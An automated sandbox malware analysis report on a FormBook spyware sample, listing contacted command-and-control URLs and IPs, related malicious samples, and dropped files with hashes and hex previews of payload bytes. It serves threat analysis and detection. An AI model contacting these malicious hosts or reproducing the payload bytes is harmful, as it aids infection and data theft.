http://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS	false	Avira URL Cloud: malware	unknown
http://www.techchains.info/fo8o/	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://track.uc.cn/collect	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0	netbtugc.exe, 00000004.00000002.3918311897.000000000413A000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.000000000382A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi	netbtugc.exe, 00000004.00000002.3918311897.000000000413A000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.000000000382A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.3918311897.000000000445E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003B4E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.shopify.com/admin/settings/domains	netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Medium.woff2?v=1674610916	netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	false		high
https://hm.baidu.com/hm.js?	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://login.live	netbtugc.exe, 00000004.00000002.3910307845.0000000002C36000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3919213991.0000000005440000.00000040.80000000.00040000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://accounts.shopify.com/recovery/stores?utm_source=gurucopy&utm_medium=link&utm_campaign=Gurus	netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR	netbtugc.exe, 00000004.00000002.3918311897.0000000004DCA000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.00000000044BA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.sedo.com/services/parking.php3	ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003B4E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.3918311897.0000000004782000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003E72000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4ds	ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003698000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.3918311897.0000000004782000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003E72000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Regular.woff2?v=1674610915	netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
185.237.107.49	www.joyesi.xyz	Ukraine	56421	UA-WEECOMI-ASUA	true
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
34.111.148.214	www.660danm.top	United States	15169	GOOGLEUS	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
202.172.28.202	www.kasegitai.tokyo	Japan	37907	DIGIROCKDigiRockIncJP	false
46.30.213.191	www.antonio-vivaldi.mobi	Denmark	51468	ONECOMDK	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432025
Start date and time:	2024-04-26 10:05:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	150-425-2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@14/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 59 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
10:07:15	API Interceptor	11625097x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	Statement Of Account.exe	Get hash	malicious	FormBook	Browse	www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	fedex awb &Invoice.vbs	Get hash	malicious	FormBook	Browse	www.winhgx.com/r6ib/
	order enquiry PDF.vbs	Get hash	malicious	FormBook	Browse	www.5597043.com/uf1r/?UDwd=fRlBiYKTb4kHHTeAB+JUEo8QwhpBajaUBAMzSQktRYr91tJh38DuECURDEfreCzcEFd3cb/SjxROJA5JZTrgYxjmLw41heutXinNmJLTVm0wgqrelA==&sRy=BLaLYB
	inpau292101.js	Get hash	malicious	FormBook	Browse	www.itsolutionsguide.com/h4wu/
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/?Gv=2at1c1MHk4LdsVUDX7pNDf+fAhTXeAfnTyG93G2uP4ilKgyCyFz2asT5AaTCMTK+FwXayJ+KsNmilZED2txkhAZ8TPVN5OugBakdvvUOZZN5OdK6QUrIUUU=&jH1=cn4P66
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/
185.237.107.49	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse
185.237.107.49	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
154.215.72.110	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
195.110.124.133	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	yx0H3RO9ur.exe	Get hash	malicious	FormBook	Browse	www.rcpbooks.site/ns03/?UPlLi=vFQdbbR8L2nPLn&uTsxF=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
	Grundforbedre39.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Apexes.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	oZF2kXw4ZRc8NjL.exe	Get hash	malicious	FormBook	Browse	www.rcpbooks.site/ns03/?wHut=ghlHUvuPX&yBkpfpPX=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
	Arborean.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Medarbejderstabens189.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Yolk.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.radiciholding.com/hjen/
116.50.37.244	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.joyesi.xyz	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	Product_Specs.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.237.107.49
www.3xfootball.com	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exe	Get hash	malicious	FormBook	Browse	154.215.74.46
www.antonio-vivaldi.mobi	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	doc2009988876370093845_1601202400.exe	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	46.30.213.185
	SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
	PO203-09024.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	PO#YATCH-INT'L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	QUOTATIONYATCHINT'L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	PURCHASE_ORDER_091020.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
	SecuriteInfo.com.FileRepMalware.18604.15295.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
www.goldenjade-travel.com	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	oVOImRIAaz.elf	Get hash	malicious	Mirai	Browse	156.252.113.238
	m2 Cotizaci#U00f3n-1634.pdf.exe	Get hash	malicious	FormBook	Browse	160.124.21.234
	Y98pGn3FUt.elf	Get hash	malicious	Mirai	Browse	156.251.7.155
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	kl7nWo7u71.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.251.7.154
	OPs5j7Yjb8.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.244.234.144
	202404153836038.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	160.124.21.234
	hCGaMRj2il.elf	Get hash	malicious	Mirai	Browse	154.203.73.149
REGISTER-ASIT	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	160420241245287.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	2024164846750.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	202404153836038.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	Ordin de plat#U0103.exe	Get hash	malicious	FormBook	Browse	81.88.63.46
	zamowienie_002523.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	mrPTE618YB.exe	Get hash	malicious	PureLog Stealer	Browse	195.110.124.188
	yx0H3RO9ur.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	4eGsl7kZ8Y.elf	Get hash	malicious	Mirai	Browse	116.50.38.9
	Iq9FbxpCn8.elf	Get hash	malicious	Unknown	Browse	101.0.250.121
	rWDo1Us2zv.elf	Get hash	malicious	Mirai	Browse	156.227.251.192
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	119.15.228.163
	skid.x86-20230924-1126.elf	Get hash	malicious	Mirai	Browse	156.227.251.175
	Y1s85ucZ3T.elf	Get hash	malicious	Unknown	Browse	119.15.194.230
	211vlko6tx.elf	Get hash	malicious	Moobot	Browse	119.15.207.49
UA-WEECOMI-ASUA	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
UA-WEECOMI-ASUA	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
SEDO-ASDE	INQ No. HDPE-16-GM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	BM-FM_NR.24040718PDF.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO0424024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	Statement Of Account.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	PO0423024.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO0423023.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.117
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO_PDF24172024.scr.exe	Get hash	malicious	FormBook	Browse	91.195.240.117

Process:	C:\Users\user\Desktop\150-425-2024.exe
File Type:	ASCII text, with very long lines (29744), with no line terminators
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	3.5430067017995834
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+I76Md4vfF3if6gyr:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Ri
MD5:	7417F69889C0A0BC64AE9B53A010B2DC
SHA1:	3766F9250AC9B93C3B3C70F1B05178A9918F1D27
SHA-256:	8C0195FE8CFBAF436B13C3A0D0D735E863F1FE316BD789844689DCAFCCB63CA0
SHA-512:	A162EBEB02503F4B2A949A1E1DF8FD4A2AE224D66D3CECCB125E702606C1B349175DE7CD48CA077484E2186BA5BFD24D264DB56A03968419CB7B292C01C360C6
Malicious:	false
Reputation:	low
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut52A6.tmp

Download File

Process:	C:\Users\user\Desktop\150-425-2024.exe
File Type:	AmigaOS bitmap font (TFCH) "\2512FV4\001\261\273Q\311\220\310\205}\271FU\365\332\362{[J\247\252\325A2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV\214Y2SV]\342EE\365;\213w\214X~\236y\0260"6aB49S+S>x!9%+.Ff4Qy@&6b1%e\005}\025vY6V6vOUAaA2FV4Y2*YK", tfc_TagCount 21336, tfc_YSize 16984, 3607 elements, 2nd "A\022BV4[2SXBXKGAr\307V4I2SHBXKEQ2FF4Y2SXBHKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXB"
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.9926021750149445
Encrypted:	true
SSDEEP:	6144:d4YspMId1UGaBWz4h0JZyGWI0xwp2Vpl89ERW9TK+uS/JAy8PHljznqc3:d4YuPcWsh0JgGZQCSmBAy8PNznL3
MD5:	BF5C06BACDAF351215354990E2547C19
SHA1:	61EDC77500CBD7F17D722619FA0C611F54846ACB
SHA-256:	56A75E7CC4F0F705C861C57C88737EED38B2B4FE13707085B4992F42DF4D7502
SHA-512:	E44750ECB8D06557562C1E69C17112E26451AEBC9BE6DBB92DA2DB4DA805EC930B50BC4911B0350D2B3924BA246CB7F1867F2CE224FBABB7CA8A61781A5FD971
Malicious:	false
Reputation:	low
Preview:	.....2FV4...Q..}.FU...{[J...A2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV.Y2SV].EE.;.w.X~.y.0"6aB49S+S>x!9%+.Ff4Qy@&6b1%e.}.vY6V6vOUAaA2FV4Y2*YK.v%&.{6S..3?.B...&1.C...~8,.[...9U..+;#x!U.V4Y2SXBX..A2.W5Y.;..XKEA2FV4.2QYIY@EA"BV4Y2SXBXK.T2FV$Y2SxFXKE.2FF4Y2QXB^KEA2FV4_2SXBXKEA.BV4[2SXBXKGAr.V4I2SHBXKEQ2FF4Y2SXBHKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKk5W>"4Y2.WFXKUA2FF0Y2CXBXKEA2FV4Y2SXbXK%A2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2S